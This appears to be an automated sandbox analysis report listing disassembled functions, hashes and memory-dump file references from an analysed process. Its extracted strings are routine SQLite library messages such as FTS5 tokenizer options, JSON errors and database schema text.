String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse
API String ID: 0-3670841456
Opcode ID: 21a3bf99b909ebb98bcd87dc229033633e290e30c89f65e79dc0390a08c7f3e6
Instruction ID: 1d78bdd8b66d473de5c9cb34d37473ccb0a105a681a53ae596af0d175e510ab9
Opcode Fuzzy Hash: 21a3bf99b909ebb98bcd87dc229033633e290e30c89f65e79dc0390a08c7f3e6
Instruction Fuzzy Hash: 9CF03024B04984EBFB10A554DD61FFB268627C0727FD550EEFA545B1E3F6289450C213

Function 1D7530F0 Relevance: 12.2, APIs: 8, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaa7e8f5e0dea767bcb533e20a73e10bef618a469ec5593a0ee1b36bba5c0d90
Instruction ID: f1d3ac25a4f5d4a7a482a96523462c32873ff1a01c0556dcedf477cb30233db2
Opcode Fuzzy Hash: aaa7e8f5e0dea767bcb533e20a73e10bef618a469ec5593a0ee1b36bba5c0d90
Instruction Fuzzy Hash: 2E51637660C200BFD740EB68FC44EAB7BE2AF85321F0A45A8F158872B1E631DD51DB52

Function 1D74B6E0 Relevance: 12.1, APIs: 8, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78cb13aa54ac7b856c2cb538a5d6947577827f5209ed72190ff53353e9c67b2c
Instruction ID: 9cc401876ba7daee331b449f05300c80f29a65b539473004894f8e5a6c17f53c
Opcode Fuzzy Hash: 78cb13aa54ac7b856c2cb538a5d6947577827f5209ed72190ff53353e9c67b2c
Instruction Fuzzy Hash: 511133B98082007FD705AB20FC41E7B77B9EF81221F458569F90987232E736E908C2A3

Function 1D7A7920 Relevance: 10.8, APIs: 7, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction ID: 5049e0f7355e162562a8f2d8c961f2a6926f9fe501d18d2307d9fa122fb77b56
Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction Fuzzy Hash: 1DB1A2B5A04602ABC704DF28DC8066AF7E9FF88264F49463EF949D3711E735E914CB92

Function 1D74E260 Relevance: 10.8, APIs: 7, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a361d8be97efc800043839f664a951d2827f3100fe8f975daebbc7d2cb9b10b3
Instruction ID: eb4fdce118549ec4ca1deb36cd8f682934b2f70ec8dc02c73c687e2de62eed40
Opcode Fuzzy Hash: a361d8be97efc800043839f664a951d2827f3100fe8f975daebbc7d2cb9b10b3
Instruction Fuzzy Hash: C5A13871A0C3518FC706CF28C89166AFBE1AF85234F258E6EF89997352E331D9448B53

Function 1D745930 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

CREATE TABLE x(input, token, start, end, position), xrefs: 1D745933
unknown tokenizer: %s, xrefs: 1D745B28
simple, xrefs: 1D745A38, 1D745A84, 1D745A95, 1D745B27

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
API String ID: 0-2679805236
Opcode ID: c639cd0dcbb7478e3395bb60fca54d9f510fe517ab2c7d9bae9237e3d14c3634
Instruction ID: eb3084a7e20e510ecb5ca39b78152419816a9feba91df172df09e92b937287ff
Opcode Fuzzy Hash: c639cd0dcbb7478e3395bb60fca54d9f510fe517ab2c7d9bae9237e3d14c3634
Instruction Fuzzy Hash: D471E271A083468FC701CF28CC84A6AB7E4FF85264F15866EE859D7611EB35F905CBA3

Function 1D84F0E0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 216COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D84F1E6, 1D84F327
unable to delete/modify user-function due to active statements, xrefs: 1D84F157, 1D84F298
%s at line %d of [%.10s], xrefs: 1D84F1EB, 1D84F32C
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D84F1DC, 1D84F31D

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: 6c9932e1ded3932ef0d73a74b2eb98b58f4cb9847dc2ce920a6610701423a2fd
Instruction ID: dd740fcc2939817be14b669b93dcc91239871d38cffc77e9adbde455cfe66bce
Opcode Fuzzy Hash: 6c9932e1ded3932ef0d73a74b2eb98b58f4cb9847dc2ce920a6610701423a2fd
Instruction Fuzzy Hash: 5A6169B6600B59BBE7028F24CC49BA777A8AF41704F25C52CF91997282E7B5E15087E3

Function 1D7D44F0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 208COMMON

Download Yara Rule

Strings

col, xrefs: 1D7D4679
row, xrefs: 1D7D46A1
fts5vocab: unknown table type: %Q, xrefs: 1D7D46DE
instance, xrefs: 1D7D46BF

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: col$fts5vocab: unknown table type: %Q$instance$row
API String ID: 0-195232091
Opcode ID: 857aa26174cd9021db5ebb6979cbdb96c6011fe427cf03dbab97dac629f3089f
Instruction ID: 0ecc21eea7fc73fc4d4de10dbad954e04cefb6a3b85c434e4bf785f65f114fc1
Opcode Fuzzy Hash: 857aa26174cd9021db5ebb6979cbdb96c6011fe427cf03dbab97dac629f3089f
Instruction Fuzzy Hash: 8C611974909B219BC7409F24DCC47AA37B4BB422AEF05023AED46DB201E735A515CFA7

Function 1D7609C2 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

cannot UPDATE a subset of columns on fts5 contentless-delete table: %s, xrefs: 1D760B3B

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: cannot UPDATE a subset of columns on fts5 contentless-delete table: %s
API String ID: 0-2869280805
Opcode ID: 91bc72156e2f6ae956cb9ca2e3145fa33d6d2c1bd0a9956c327a239e8eb1f4b8
Instruction ID: 924ac3ccb8d6de398a07c50822a7ad7d09033b892d42ed0679ca1d0a4d1ad9ef
Opcode Fuzzy Hash: 91bc72156e2f6ae956cb9ca2e3145fa33d6d2c1bd0a9956c327a239e8eb1f4b8
Instruction Fuzzy Hash: 5941B2BA605311AFE7119F58EC80966F3B4FF84275B00457AFA4887721F772E854C7A2

Function 1D753F30 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 169COMMON

Download Yara Rule

Strings

separators=, xrefs: 1D7540A3
remove_diacritics=1, xrefs: 1D753FA2
remove_diacritics=2, xrefs: 1D754021
tokenchars=, xrefs: 1D75406A
remove_diacritics=0, xrefs: 1D753FE1

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
API String ID: 0-131617836
Opcode ID: 5a5bf1ff3de6d29621a2ca0fb87439f63b3ecc0ce472c7f0f8a70bd532a2ae74
Instruction ID: 3eaaa85176dc7f81f534674c57d1cbbe882c9f39c05d291f9ba3211e14db21e7
Opcode Fuzzy Hash: 5a5bf1ff3de6d29621a2ca0fb87439f63b3ecc0ce472c7f0f8a70bd532a2ae74
Instruction Fuzzy Hash: 6D51027AB042868BD300DF14D48077AB7B1BB42238FD542ADE84E5F641D732EC868B53

Function 1D751120 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

rbu_memory, xrefs: 1D7511F5
main, xrefs: 1D7511A6

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: main$rbu_memory
API String ID: 0-3973752345
Opcode ID: f630f65dbfcde74daeaece9f061e18b836871f566b7d09deffff8850bf5841bd
Instruction ID: 908751d12824e6b14c6501327149eda6bd9a4bd88711460f1d70f84c3246c85b
Opcode Fuzzy Hash: f630f65dbfcde74daeaece9f061e18b836871f566b7d09deffff8850bf5841bd
Instruction Fuzzy Hash: 5251EF757083019FDB008F69E884B6AB7E8AF85266F01826EED45D7711DB35E805CBA3

Function 1D748C40 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156COMMON

Download Yara Rule

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 1D748D35
winAccess, xrefs: 1D748D60

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 0-1873940834
Opcode ID: 42dbc1e982a2a7a4fc9518e64b75df28cbcefa869c9db5e64dc2801f518bf0a3
Instruction ID: 2dd40d87739213681c63e9e471657c55cf69af75c2efcb64ca82c749ae15dd60
Opcode Fuzzy Hash: 42dbc1e982a2a7a4fc9518e64b75df28cbcefa869c9db5e64dc2801f518bf0a3
Instruction Fuzzy Hash: ED412D72D0A345DBC3029F2888C166BF7E0BB99234F658B2BF966532A1D734D444CA83

Function 1D86E5B0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 147COMMON

Download Yara Rule

Strings

tVj, xrefs: 1D86E6F7
d., xrefs: 1D86E6E7
%s at line %d of [%.10s], xrefs: 1D86E67A
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D86E66B
database corruption, xrefs: 1D86E675

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$tVj$d.
API String ID: 0-1527448856
Opcode ID: 1a95fb3ba36135ee5d5837ef73d7f31b68c5f5b283790a1bc53b75763eeb08f3
Instruction ID: 02ca6372d1bc3966cc231ea2cbac2466c9df44d9b5554ec27dc7bd288b04bb01
Opcode Fuzzy Hash: 1a95fb3ba36135ee5d5837ef73d7f31b68c5f5b283790a1bc53b75763eeb08f3
Instruction Fuzzy Hash: 894125795042019AC713DF64EC40B7A77A5AF41328F05C469FA8987592E736F416CBB3

Function 1D859350 Relevance: 10.6, APIs: 7, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06655a0ce435adf6b65fc807412dda07a2e85ca5f8a236e8c55058eba7a39e4e
Instruction ID: e525b512242e4adfd7e227d1eca27bc2482097f61f0cccef554b0a81086c2ae8
Opcode Fuzzy Hash: 06655a0ce435adf6b65fc807412dda07a2e85ca5f8a236e8c55058eba7a39e4e
Instruction Fuzzy Hash: 00515E74418220DBDB006B74DDCCB2A37B8BF036DAF014268F90696611DB39E954DE73

Function 1D7E15C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 135COMMON

Download Yara Rule

Strings

JSON cannot hold BLOB values, xrefs: 1D7E16D9
%!0.15g, xrefs: 1D7E160A
null, xrefs: 1D7E15EE

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %!0.15g$JSON cannot hold BLOB values$null
API String ID: 0-3074873597
Opcode ID: 017699d65f87bc6a5273077cfba61be7f85fea214fd6362aa064cd33eabb0d93
Instruction ID: e24a899f1bfccceb31e2243236230c0e6c0617dce669e677ce6c49134dfcc5ef
Opcode Fuzzy Hash: 017699d65f87bc6a5273077cfba61be7f85fea214fd6362aa064cd33eabb0d93
Instruction Fuzzy Hash: 2741BFB5604700AAE3105B14FC87BFA73B4DB413B9F04072AEA55C5592D769A59883E3

Function 1D751D50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 1D751E2C
no such database: %s, xrefs: 1D751E05

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
